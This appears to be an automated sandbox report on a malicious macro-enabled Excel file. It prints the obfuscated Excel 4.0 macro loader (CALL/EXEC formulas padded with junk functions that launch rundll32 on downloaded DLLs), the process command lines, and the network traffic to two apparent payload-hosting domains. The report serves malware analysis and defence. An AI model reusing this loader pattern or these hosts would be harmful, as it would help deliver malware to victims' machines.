                                                                                                                                                                  OLE File "32154f4c_by_Libranalysis.xls"

                                                                                                                                                                  Indicators

                                                                                                                                                                  Has Summary Info:True
                                                                                                                                                                  Application Name:Microsoft Excel
                                                                                                                                                                  Encrypted Document:False
                                                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                                                  Contains Workbook/Book Stream:True
                                                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                                  Flash Objects Count:
                                                                                                                                                                  Contains VBA Macros:True

                                                                                                                                                                  Summary

                                                                                                                                                                  Code Page:1251
                                                                                                                                                                  Author:van-van
                                                                                                                                                                  Last Saved By:vi-vi
                                                                                                                                                                  Create Time:2006-09-16 00:00:00
                                                                                                                                                                  Last Saved Time:2021-05-12 07:24:11
                                                                                                                                                                  Creating Application:Microsoft Excel
                                                                                                                                                                  Security:0

                                                                                                                                                                  Document Summary

                                                                                                                                                                  Document Code Page:1251
                                                                                                                                                                  Thumbnail Scaling Desired:False
                                                                                                                                                                  Contains Dirty Links:False

                                                                                                                                                                  Streams

                                                                                                                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                  General
                                                                                                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Stream Size:4096
                                                                                                                                                                  Entropy:0.287037498961
                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                                                                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                  General
                                                                                                                                                                  Stream Path:\x5SummaryInformation
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Stream Size:4096
                                                                                                                                                                  Entropy:0.290777742057
                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                                                                                                  Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363283
                                                                                                                                                                  General
                                                                                                                                                                  Stream Path:Book
                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                                  Stream Size:363283
                                                                                                                                                                  Entropy:3.24522262131
                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                  Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                                                                                                                                                                  Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                  Macro 4.0 Code

                                                                                                                                                                  CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)
                                                                                                                                                                  
                                                                                                                                                                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(""U""&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she
                                                                                                                                                                  "=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"
                                                                                                                                                                  "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"

                                                                                                                                                                  Network Behavior

                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                  TCP Packets

                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  May 12, 2021 13:46:44.070152998 CEST49713443192.168.2.3192.185.39.58
                                                                                                                                                                  May 12, 2021 13:46:44.234858036 CEST44349713192.185.39.58192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:44.235011101 CEST49713443192.168.2.3192.185.39.58
                                                                                                                                                                  May 12, 2021 13:46:44.236267090 CEST49713443192.168.2.3192.185.39.58
                                                                                                                                                                  May 12, 2021 13:46:44.401813030 CEST44349713192.185.39.58192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:44.403754950 CEST44349713192.185.39.58192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:44.403784037 CEST44349713192.185.39.58192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:44.403804064 CEST44349713192.185.39.58192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:44.403831959 CEST49713443192.168.2.3192.185.39.58
                                                                                                                                                                  May 12, 2021 13:46:44.403850079 CEST49713443192.168.2.3192.185.39.58
                                                                                                                                                                  May 12, 2021 13:46:44.418384075 CEST49713443192.168.2.3192.185.39.58
                                                                                                                                                                  May 12, 2021 13:46:44.582916975 CEST44349713192.185.39.58192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:44.583065987 CEST49713443192.168.2.3192.185.39.58
                                                                                                                                                                  May 12, 2021 13:46:44.583971977 CEST49713443192.168.2.3192.185.39.58
                                                                                                                                                                  May 12, 2021 13:46:44.787693024 CEST44349713192.185.39.58192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:44.854161024 CEST44349713192.185.39.58192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:44.854285002 CEST49713443192.168.2.3192.185.39.58
                                                                                                                                                                  May 12, 2021 13:46:44.854438066 CEST49713443192.168.2.3192.185.39.58
                                                                                                                                                                  May 12, 2021 13:46:44.854484081 CEST44349713192.185.39.58192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:44.854536057 CEST49713443192.168.2.3192.185.39.58
                                                                                                                                                                  May 12, 2021 13:46:44.935035944 CEST49715443192.168.2.3192.185.32.232
                                                                                                                                                                  May 12, 2021 13:46:45.016959906 CEST44349713192.185.39.58192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:45.099785089 CEST44349715192.185.32.232192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:45.099924088 CEST49715443192.168.2.3192.185.32.232
                                                                                                                                                                  May 12, 2021 13:46:45.100647926 CEST49715443192.168.2.3192.185.32.232
                                                                                                                                                                  May 12, 2021 13:46:45.262890100 CEST44349715192.185.32.232192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:49.668385983 CEST44349715192.185.32.232192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:49.668435097 CEST44349715192.185.32.232192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:49.668458939 CEST44349715192.185.32.232192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:49.668548107 CEST49715443192.168.2.3192.185.32.232
                                                                                                                                                                  May 12, 2021 13:46:49.668571949 CEST49715443192.168.2.3192.185.32.232
                                                                                                                                                                  May 12, 2021 13:46:49.794229031 CEST49715443192.168.2.3192.185.32.232
                                                                                                                                                                  May 12, 2021 13:46:49.956300974 CEST44349715192.185.32.232192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:50.071284056 CEST44349715192.185.32.232192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:50.071424007 CEST49715443192.168.2.3192.185.32.232
                                                                                                                                                                  May 12, 2021 13:46:50.072190046 CEST49715443192.168.2.3192.185.32.232
                                                                                                                                                                  May 12, 2021 13:46:50.235153913 CEST44349715192.185.32.232192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:50.887480974 CEST44349715192.185.32.232192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:50.887643099 CEST49715443192.168.2.3192.185.32.232
                                                                                                                                                                  May 12, 2021 13:46:50.888309956 CEST44349715192.185.32.232192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:50.888391972 CEST49715443192.168.2.3192.185.32.232
                                                                                                                                                                  May 12, 2021 13:47:20.888696909 CEST44349715192.185.32.232192.168.2.3

                                                                                                                                                                  UDP Packets

                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  May 12, 2021 13:46:26.761933088 CEST5128153192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:26.815264940 CEST4919953192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:26.819153070 CEST53512818.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:26.883259058 CEST53491998.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:27.099818945 CEST5062053192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:27.151354074 CEST53506208.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:30.200562954 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:30.249361038 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:31.636799097 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:31.685542107 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:32.248188019 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:32.304311991 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:33.017411947 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:33.068999052 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:38.176083088 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:38.224958897 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:39.140338898 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:39.189119101 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:39.323874950 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:39.411524057 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:39.872663021 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:39.944910049 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:40.903503895 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:40.977415085 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:41.952996016 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:42.015737057 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:43.996301889 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:44.015774965 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:44.053409100 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:44.067540884 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:44.213686943 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:44.262556076 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:44.870599985 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:44.932504892 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:46.638672113 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:46.689131021 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:47.997087002 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:48.054271936 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:48.067842960 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:48.117775917 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:49.194061041 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:49.242885113 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:53.141572952 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:53.190372944 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:54.076982021 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:54.134619951 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:55.387969017 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:55.438996077 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:56.554163933 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:56.605653048 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:46:57.779438019 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:46:57.842417002 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:47:01.754760027 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:47:01.803445101 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:47:02.901367903 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:47:02.952907085 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:47:03.841984987 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:47:03.914035082 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:47:04.091702938 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:47:04.140539885 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:47:04.942893028 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:47:04.997864962 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:47:06.250641108 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:47:06.317712069 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:47:17.149895906 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:47:17.210304976 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:47:22.009177923 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:47:22.066814899 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:47:22.160475969 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:47:22.218136072 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:47:52.491331100 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:47:52.548871994 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:48:08.322853088 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:48:08.381721020 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                  May 12, 2021 13:48:33.431080103 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                  May 12, 2021 13:48:33.499046087 CEST53636198.8.8.8192.168.2.3

                                                                                                                                                                  DNS Queries

                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                  May 12, 2021 13:46:44.015774965 CEST192.168.2.38.8.8.80x5e35Standard query (0)signifysystem.comA (IP address)IN (0x0001)
                                                                                                                                                                  May 12, 2021 13:46:44.870599985 CEST192.168.2.38.8.8.80x6e54Standard query (0)fcventasyservicios.clA (IP address)IN (0x0001)

                                                                                                                                                                  DNS Answers

                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                  May 12, 2021 13:46:44.067540884 CEST8.8.8.8192.168.2.30x5e35No error (0)signifysystem.com192.185.39.58A (IP address)IN (0x0001)
                                                                                                                                                                  May 12, 2021 13:46:44.932504892 CEST8.8.8.8192.168.2.30x6e54No error (0)fcventasyservicios.cl192.185.32.232A (IP address)IN (0x0001)

                                                                                                                                                                  HTTPS Packets

                                                                                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                  May 12, 2021 13:46:44.403804064 CEST192.185.39.58443192.168.2.349713CN=cpcontacts.signifysystem.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Apr 01 17:00:25 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Wed Jun 30 17:00:25 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                  CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                  May 12, 2021 13:46:49.668458939 CEST192.185.32.232443192.168.2.349715CN=mail.fcventasyservicios.cl CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Mar 16 13:01:12 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon Jun 14 14:01:12 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                  CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                                  Code Manipulations

                                                                                                                                                                  Statistics

                                                                                                                                                                  CPU Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  Memory Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                  Behavior

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  System Behavior

                                                                                                                                                                  General

                                                                                                                                                                  Start time:13:46:36
                                                                                                                                                                  Start date:12/05/2021
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                  Imagebase:0x890000
                                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high

                                                                                                                                                                  General

                                                                                                                                                                  Start time:13:46:49
                                                                                                                                                                  Start date:12/05/2021
                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:rundll32 ..\ritofm.cvm,DllRegisterServer
                                                                                                                                                                  Imagebase:0x200000
                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high

                                                                                                                                                                  General

                                                                                                                                                                  Start time:13:46:51
                                                                                                                                                                  Start date:12/05/2021
                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:rundll32 ..\ritofm.cvm1,DllRegisterServer
                                                                                                                                                                  Imagebase:0x200000
                                                                                                                                                                  File size:61952 bytes
